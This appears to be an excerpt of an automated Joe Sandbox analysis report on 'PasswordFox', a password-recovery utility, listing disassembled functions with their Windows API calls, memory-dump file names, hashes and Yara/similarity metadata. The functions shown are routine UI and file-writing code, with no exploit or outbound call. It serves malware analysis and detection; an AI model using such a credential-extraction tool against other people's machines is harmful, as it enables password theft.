                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 00407555
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        • Opcode ID: 8e42905d616ee62d3a71394b24c9355df5b8a6e7cd44ce9fb49adfdd9a68abef
                                        • Instruction ID: d65a9cf6224a5409b15ed1d665fbe15c93bc85d1052f7d2db398c8f07851f168
                                        • Opcode Fuzzy Hash: 8e42905d616ee62d3a71394b24c9355df5b8a6e7cd44ce9fb49adfdd9a68abef
                                        • Instruction Fuzzy Hash: 2D0186F2D4012966DB20A755CC45FEA76ACEF44708F0000B6BB08B71D2D778AF458AD8
                                        Function 0040593F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405962
                                        • GetPrivateProfileStringW.KERNEL32(0040FDA8,00000000,0040C3EC,?,00001000,0040FB98), ref: 00405988
                                        • wcscpy.MSVCRT ref: 004059A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfileStringmemsetwcscpy
                                        • String ID: `$@
                                        • API String ID: 2806480022-815968772
                                        • Opcode ID: a87ada5f4edb05219421df81ad9726ad7a912981c381155625a111f65f6c177f
                                        • Instruction ID: c2dce99854ee5259c53899cef62a5f819c9370b8d6e2142060e2f1bd629cf35d
                                        • Opcode Fuzzy Hash: a87ada5f4edb05219421df81ad9726ad7a912981c381155625a111f65f6c177f
                                        • Instruction Fuzzy Hash: 43F08932550308EAFB149B50DC8AF9A336DDB04704F1040B6BB05F10D3DBB89A84CB9D
                                        Function 0040103E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404592: memset.MSVCRT ref: 0040459C
                                          • Part of subcall function 00404592: wcscpy.MSVCRT ref: 004045DC
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: e7c03dd706a1a2bd21d71d6fbe72e08e818ab4e1cbea5ffe71625ab417b1cfc3
                                        • Instruction ID: d10cd1735ba576b22d97866ba08d14aa0171280ce920b1492f1b9ab4db4955c2
                                        • Opcode Fuzzy Hash: e7c03dd706a1a2bd21d71d6fbe72e08e818ab4e1cbea5ffe71625ab417b1cfc3
                                        • Instruction Fuzzy Hash: 6EF08275A50304B7EA217BE0DD86F4A77ADA744B00F004539F751BA1E0D6B4A546CA58
                                        Function 004046B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        • Opcode ID: 1269dbbbcc9ee751f7553f12adc322cf3611892b3440b928ac3e05d2c27f1def
                                        • Instruction ID: 9868196516a9be475eaa27a1b50fb8344eac8dae48937d3e294beb3532af5590
                                        • Opcode Fuzzy Hash: 1269dbbbcc9ee751f7553f12adc322cf3611892b3440b928ac3e05d2c27f1def
                                        • Instruction Fuzzy Hash: 3AE01B71DC031DA6EB14E7A0DC8AFA577ACE710704F1005B57915F10D2E77496454A99
                                        Function 0040AC9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040957E), ref: 0040ACAB
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040ACC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        • Opcode ID: fe6797a427383c24e355645d860177a1fc7fc69b22948a41a82ae9843476e567
                                        • Instruction ID: 1038c5354ee48156a0843022f71e4766f2c1a4c27faf47684b647c396cf16a0a
                                        • Opcode Fuzzy Hash: fe6797a427383c24e355645d860177a1fc7fc69b22948a41a82ae9843476e567
                                        • Instruction Fuzzy Hash: F6D092B0956300EFEB805BA4AF997413AA8B700715F21443AE801B23E0DBBE8484CA1D
                                        Function 00407CE2 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040652D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040654F
                                          • Part of subcall function 0040652D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004065E4
                                        • wcslen.MSVCRT ref: 00407D10
                                        • _wtoi.MSVCRT(?), ref: 00407D1C
                                        • _wcsicmp.MSVCRT ref: 00407D6A
                                        • _wcsicmp.MSVCRT ref: 00407D7B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        • Opcode ID: a474d6a3ac8f4210ac99ab163c9fff60aad0ec8605643463d23e5f5efd9e8fc4
                                        • Instruction ID: cffbb6c67c50ede4b810201e5db79530c50e5aceff8745b8abd235541a153f00
                                        • Opcode Fuzzy Hash: a474d6a3ac8f4210ac99ab163c9fff60aad0ec8605643463d23e5f5efd9e8fc4
                                        • Instruction Fuzzy Hash: 4B417131A01605EBDB21DF69C980AAEBBF0FF44304F10447EE956E7391D738B9909B85
                                        Function 00405239 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401490,?,?,?,?,0040DA78,0000000C), ref: 0040526E
                                        • memset.MSVCRT ref: 0040527F
                                        • memcpy.MSVCRT(0040F2B0,?,00000000,00000000,00000000,00000000,00000000,?,?,00401490,?,?,?,?,0040DA78,0000000C), ref: 0040528B
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00405298
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: af406a04a4b50c514b405494a77c7ae63ce10921d1a9d2c14b4e3b54fe6e2e40
                                        • Instruction ID: 6c8d8dc775e92071ce88189a1a733c574a093dd66673860a6709b5512b2c3d78
                                        • Opcode Fuzzy Hash: af406a04a4b50c514b405494a77c7ae63ce10921d1a9d2c14b4e3b54fe6e2e40
                                        • Instruction Fuzzy Hash: CE114F712046019FD328DF1DC881A27F7E5EFD8314B24892EE59A97395D735E841CF54
                                        Function 0040ADF2 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040AE02
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AE34
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AE48
                                        • wcscpy.MSVCRT ref: 0040AE5B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        • Opcode ID: 8531b8b96a5ff0b16edbb0b48f9d725383d9776768608dab97c6698888b3ab15
                                        • Instruction ID: 01b55f20cceb296a23f5d1b4378d9ed000a8bdefdfddbcb88ab9166c3752c1de
                                        • Opcode Fuzzy Hash: 8531b8b96a5ff0b16edbb0b48f9d725383d9776768608dab97c6698888b3ab15
                                        • Instruction Fuzzy Hash: 2411E8B5900208EFDB00DFA9D9889AEB7F8EB48314F10446AE905E7251D7389A45CFA9
                                        Function 00407FC5 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                        • _snwprintf.MSVCRT ref: 00407FF2
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00408057
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        • _snwprintf.MSVCRT ref: 0040801D
                                        • wcscat.MSVCRT ref: 00408030
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: cecf6b3ba9b2bc983d970857ae202e2e7dcdb805c80cf490bf672af551e5d286
                                        • Instruction ID: 7d62326514c30f2996f5644e502fbb67f1eebbbaea245bd59ac79611c45167cd
                                        • Opcode Fuzzy Hash: cecf6b3ba9b2bc983d970857ae202e2e7dcdb805c80cf490bf672af551e5d286
                                        • Instruction Fuzzy Hash: EA01B1B25003086BE720B365DC86FBB73ACDB40748F00047AB719F21C3DA38A9558A6D
                                        Function 0040215A Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040217F
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 0040219C
                                        • strlen.MSVCRT ref: 004021AE
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004021BF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 6cb8a34a761912faa8ac38dee8a575437cfbeb5ecd169eee6093785f45105e23
                                        • Instruction ID: 5b4a580a9afbc116114165902e6f407056a70142a6cda248b66e7e205d5b1b91
                                        • Opcode Fuzzy Hash: 6cb8a34a761912faa8ac38dee8a575437cfbeb5ecd169eee6093785f45105e23
                                        • Instruction Fuzzy Hash: 68F0F9B640122CBEEB05ABD49DC9DEB77ACDB04254F0002B6B719E2092D6749F44CBA9
                                        Function 00406BE3 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406C08
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C57C,?,?,?,?,?,004022DF), ref: 00406C21
                                        • strlen.MSVCRT ref: 00406C33
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,004022DF,?,?,00000008), ref: 00406C44
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 5aa5a3b3c08058aebe5663790a2d456f728e6c27c00bfa616eb4cab50e3aca0f
                                        • Instruction ID: ca73ae1933ecf1bbfb280cec36af4ac0c48ef5680dcacbfd9dbc6e772decb399
                                        • Opcode Fuzzy Hash: 5aa5a3b3c08058aebe5663790a2d456f728e6c27c00bfa616eb4cab50e3aca0f
                                        • Instruction Fuzzy Hash: 08F0A9B640122CBEEB059B949DC9DEB77ACDB04254F0042B6B719E2192D6749F44CBA8
                                        Function 0040A825 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004046B2: memset.MSVCRT ref: 004046D1
                                          • Part of subcall function 004046B2: GetClassNameW.USER32(?,00000000,000000FF), ref: 004046E8
                                          • Part of subcall function 004046B2: _wcsicmp.MSVCRT ref: 004046FA
                                        • SetBkMode.GDI32(?,00000001), ref: 0040A84C
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040A85A
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040A868
                                        • GetStockObject.GDI32(00000000), ref: 0040A870
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 627533290ad874b04cae142c4f1d449b0d86b414305bd16aaac97a702ec6867f
                                        • Instruction ID: 14f035e3676bdca9974515920c8ce13e1728c692c7fe0e77eb57e171f9705ac8
                                        • Opcode Fuzzy Hash: 627533290ad874b04cae142c4f1d449b0d86b414305bd16aaac97a702ec6867f
                                        • Instruction Fuzzy Hash: 5DF08C32100209FBCF253FA5DC09A9E3B25AF04361F10C236FA15741F1CA7988A0DA49
                                        Function 00409E0D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(0040F5C8,?,00000050,?,004014D4,?), ref: 00409E27
                                        • memcpy.MSVCRT(0040F2F8,?,000002CC,0040F5C8,?,00000050,?,004014D4,?), ref: 00409E39
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409E4C
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00009B23,00000000), ref: 00409E60
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 07a75c4b686bdf10da6d20a7fa06ca80fffb70e214758e8830736ea6c9825698
                                        • Instruction ID: f944e8ee28cea8addfebdb5eace4f3b51803774482c945df87ae2f44757a6356
                                        • Opcode Fuzzy Hash: 07a75c4b686bdf10da6d20a7fa06ca80fffb70e214758e8830736ea6c9825698
                                        • Instruction Fuzzy Hash: 66F08931654310BBD760AB54BC06F5636A0E744F12F24057AFA41B50D1D3BA0595CBCC
                                        Function 00408CCE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00408D2E
                                        • SetFocus.USER32(?,0040D124,?), ref: 00408DCA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FocusMessageSend
                                        • String ID: Q.@
                                        • API String ID: 223698058-4024751401
                                        • Opcode ID: 373d8ffff2fe50eca12e560ce30c295213923caf74c15fb5872483c6e38fe0cd
                                        • Instruction ID: ea227be7026451b4e5dbc1450cab4db2f21189eb84d5aa359695cb02a96ede71
                                        • Opcode Fuzzy Hash: 373d8ffff2fe50eca12e560ce30c295213923caf74c15fb5872483c6e38fe0cd
                                        • Instruction Fuzzy Hash: C351B4306002049ADB30AB25C989FEE72A25B50B68F52417FF1997F2E2CF795C858B4D
                                        Function 00406C4E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00406C90
                                        • wcschr.MSVCRT ref: 00406C9E
                                          • Part of subcall function 00404EEB: wcslen.MSVCRT ref: 00404F07
                                          • Part of subcall function 00404EEB: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,00406CE6,?), ref: 00404F2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcschr$memcpywcslen
                                        • String ID: "
                                        • API String ID: 1983396471-123907689
                                        • Opcode ID: da2ba4c61535efc9af471724ec7600097bc8c61c473a7b97c8991c2fd6d2e592
                                        • Instruction ID: 4bf1fa089a2ee370b459162281fe9c31dc42728a176ac04e87decefd6409daad
                                        • Opcode Fuzzy Hash: da2ba4c61535efc9af471724ec7600097bc8c61c473a7b97c8991c2fd6d2e592
                                        • Instruction Fuzzy Hash: 96319275904214EFDF14EF65C8419EE7BF8EF44324B21427BE812BB1C1D778AA518A98
                                        Function 00404B1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00404B60
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404B70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
